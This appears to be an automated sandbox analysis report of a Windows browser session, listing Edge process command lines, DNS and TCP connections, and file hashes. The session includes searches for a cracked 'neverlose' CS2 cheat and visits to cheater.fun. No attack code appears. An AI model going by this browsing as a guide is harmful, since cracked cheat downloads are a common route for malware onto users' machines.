"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=2jTr0Dq_kmE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?client=opera-gx&q=neverlose+crack+cs2+legit+download+no+virus&sourceid=opera&ie=UTF-8&oe=UTF-8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?client=opera-gx&q=neverlose+crack+cs2+legit+download+no+virus&sourceid=opera&ie=UTF-8&oe=UTF-8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cheater.fun/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7224 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cheater.fun/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7844 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cheater.fun/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8160 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/results?search_query=neverlose+cs2+hvh+config+no+scam+no+virus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?client=opera-gx&q=neverlose+crack+cs2+legit+download+no+virus&sourceid=opera&ie=UTF-8&oe=UTF-8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2324 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.180.14:443 www.youtube.com tcp
GB 142.250.180.14:443 www.youtube.com tcp
GB 142.250.180.14:443 www.youtube.com udp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 rr5---sn-aigl6ner.googlevideo.com udp
GB 142.250.200.22:443 i.ytimg.com tcp
GB 173.194.183.138:443 rr5---sn-aigl6ner.googlevideo.com tcp
GB 173.194.183.138:443 rr5---sn-aigl6ner.googlevideo.com tcp
GB 142.250.200.22:443 i.ytimg.com udp
US 8.8.8.8:53 14.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 22.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 138.183.194.173.in-addr.arpa udp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 rr3---sn-aigl6nsd.googlevideo.com udp
GB 64.233.167.84:443 accounts.google.com tcp
GB 74.125.105.40:443 rr3---sn-aigl6nsd.googlevideo.com udp
GB 64.233.167.84:443 accounts.google.com udp
US 8.8.8.8:53 40.105.125.74.in-addr.arpa udp
US 8.8.8.8:53 84.167.233.64.in-addr.arpa udp
US 8.8.8.8:53 100.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 216.58.201.106:443 jnn-pa.googleapis.com tcp
GB 216.58.201.106:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
GB 216.58.212.193:443 yt3.ggpht.com tcp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.169.46:443 play.google.com tcp
GB 172.217.169.46:443 play.google.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.201.100:443 www.google.com tcp
GB 172.217.169.46:443 play.google.com udp
US 8.8.8.8:53 193.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 100.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
GB 216.58.201.110:443 youtube.com tcp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
GB 173.194.183.138:443 rr5---sn-aigl6ner.googlevideo.com udp
US 8.8.8.8:53 lh4.googleusercontent.com udp
GB 142.250.178.1:443 lh4.googleusercontent.com tcp
US 8.8.8.8:53 1.178.250.142.in-addr.arpa udp
GB 216.58.201.100:443 www.google.com udp
US 8.8.8.8:53 2.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.cheater.fun udp
US 104.26.15.166:443 www.cheater.fun tcp
US 104.26.15.166:443 www.cheater.fun tcp
US 8.8.8.8:53 cheater.fun udp
US 8.8.8.8:53 166.15.26.104.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.178.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 66.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 72.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 p4-c4u2npiclvbqu-6jianhwpcgkahtul-if-v6exp3-v4.metric.gstatic.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 216.58.201.99:443 p4-c4u2npiclvbqu-6jianhwpcgkahtul-if-v6exp3-v4.metric.gstatic.com tcp
GB 142.250.200.1:443 tpc.googlesyndication.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 1.200.250.142.in-addr.arpa udp
GB 216.58.201.99:443 p4-c4u2npiclvbqu-6jianhwpcgkahtul-if-v6exp3-v4.metric.gstatic.com udp
GB 142.250.200.1:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 p4-c4u2npiclvbqu-6jianhwpcgkahtul-358626-i1-v6exp3.ds.metric.gstatic.com udp
US 8.8.8.8:53 p4-c4u2npiclvbqu-6jianhwpcgkahtul-358626-i2-v6exp3.v4.metric.gstatic.com udp
GB 142.250.200.50:443 p4-c4u2npiclvbqu-6jianhwpcgkahtul-358626-i1-v6exp3.ds.metric.gstatic.com tcp
GB 216.58.201.114:443 p4-c4u2npiclvbqu-6jianhwpcgkahtul-358626-i2-v6exp3.v4.metric.gstatic.com tcp
US 8.8.8.8:53 50.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 114.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 216.239.32.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.200.22:443 i.ytimg.com udp
GB 216.58.204.78:443 www.youtube.com udp
US 8.8.8.8:53 78.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
GB 64.233.167.84:443 accounts.google.com udp
GB 216.58.212.193:443 yt3.ggpht.com udp
GB 172.217.169.46:443 www.youtube.com udp
GB 216.58.201.106:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 p4-c4u2npiclvbqu-6jianhwpcgkahtul-358626-s1-v6exp3-v4.metric.gstatic.com udp
GB 142.250.187.195:443 p4-c4u2npiclvbqu-6jianhwpcgkahtul-358626-s1-v6exp3-v4.metric.gstatic.com tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
GB 216.58.201.100:443 www.google.com udp

Files

memory/2044-0-0x00007FFCCDA23000-0x00007FFCCDA25000-memory.dmp

memory/2044-1-0x000001D6B7B70000-0x000001D6B7BB4000-memory.dmp

memory/2044-2-0x00007FFCCDA20000-0x00007FFCCE4E1000-memory.dmp

memory/2044-3-0x00007FFCCDA20000-0x00007FFCCE4E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 38f59a47b777f2fc52088e96ffb2baaf
SHA1 267224482588b41a96d813f6d9e9d924867062db
SHA256 13569c5681c71dc42ab57d34879f5a567d7b94afe0e8f6d7c6f6c1314fb0087b
SHA512 4657d13e1bb7cdd7e83f5f2562f5598cca12edf839626ae96da43e943b5550fab46a14b9018f1bec90de88cc714f637605531ccda99deb9e537908ddb826113b

\??\pipe\LOCAL\crashpad_316_WHJVMJVUIGQUUABI

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ab8ce148cb7d44f709fb1c460d03e1b0
SHA1 44d15744015155f3e74580c93317e12d2cc0f859
SHA256 014006a90e43ea9a1903b08b843a5aab8ad3823d22e26e5b113fad5f9fa620ff
SHA512 f685423b1eaee18a2a06030b4b2977335f62499c0041c142a92f6e6f846c2b9ce54324b6ae94efbbb303282dcda70e2b1597c748fddc251c0b3122a412c2d7c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b16decc7bdc3bcc6dc0571b25edd9716
SHA1 806467a56b643122026d67cf3365b77fc54ddd1c
SHA256 cb625801dc89a8d4444a7b338e314f85b02174d9a9c0ab35cdfb9951179186f5
SHA512 663ca85f8416468c405298309928931626ffec5dd0a260e3e52ce24ce857378f929b5e5cabd096b938de4b189f654d90161d3d263e1afc8d09d032c3b041f883

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 685ca5acf417be0f074260add31098a8
SHA1 650b17263a9dc345877d1ed93ed10cfe745d9a52
SHA256 1caeb66d2fcd4c95a3c45ed27e9674106e867792a0e706154cc15aec5b272520
SHA512 a34dde5ac4628baf59c99fae0db11ec7a9836dd663345c2557f9adf77c1b356b28252f1b7baffc24a8b5c2b3ef3c2fdf9b88232da2aa7d61048239683885e482

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 e87151f81d3fb0abbd00cc39d052577f
SHA1 1f2d230252bf7daa0fee1dc84c5d0b98b8ca7842
SHA256 9f93fe793aeec65def1f61a19be90cd7c1c1622c49bcfa9f715de68f7a1c202a
SHA512 770d3595f90cc76d015382310b8b6f75449bb11ff299eb3d4706282248b66334575c030c9aa1868a79b598f306b6ffcf20bda3fcaea2b44fd142b18acf47c5d6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe58240d.TMP

MD5 20cb63009b76f0cc7ae9f076767889e6
SHA1 dc2a3776999c599bd5f4fd860b60384989595ad1
SHA256 6308cea1a31f838cf0bc558583c8d45ee6fd070ca4bfaabb48566d6b791f1bd8
SHA512 84b622589cd1cfef605a17417428e115f12edda6c961d25430b79aa1e918c9a8100004d20c5167ef707aca40e7fd5b61853558cc3113ce5b794cae1240243717

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9a84813e6aefe2bd1343a800b5cc87f8
SHA1 01737d175c21184b513885afb422a2076c1e64ce
SHA256 a803dd1db371a1d08865b4778bca8bfb9683233b492dbf33c5bf50e79b7165a4
SHA512 45200d52aeb2f3ccd67ba67129d413fa7a9d60fe6cbc2fd8fcb962d8cc56cdc2d58d1e9e38ad0e0e19091633fabf5ce04e73e78221305e8da33b1cbba3b33cb7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6cd64166a2f87eee75d9667ac43d2adc
SHA1 eb69f8b8a2dc8857235cf21022f9d4a24ebfb790
SHA256 509a4cbd2515102a2ef067d5135d39af515c6b46dc52996d8f14743bf07bfa53
SHA512 7700c3c2e274443c33182c60d1f2cd701e8c93d85b9ab7cb9fca3fb29383cf36817546003283f80e0df3a1d0f65ba24935830d29a3ef890bc44ee966bf0eaded

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 d50ab8e866600acd4267da30760213ff
SHA1 2b9f69a0a6ab6bacec96adaef432a123067fddf9
SHA256 25792c39e3868fb744e432d1ba0ade42ee3889206833723a867a5ecaa5e5c0ba
SHA512 aa9e02b3f5dcc28ce82fd7ba6bedb0d26fb86ade39d3630a7d04324ebeaabe25bfa2d2f6bd2ef01893f0c2bb681105c7e330f7f79090d370ecb035ee5988b717

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 d426f91c4085ce0fd228b8241ffc6092
SHA1 b8aee79a3e854ae301afa9cc822ee9933839d5ab
SHA256 f020095933fb6569d5dc697031a1ddcbafb7ebb891dd4fc8a6aaba7238a27663
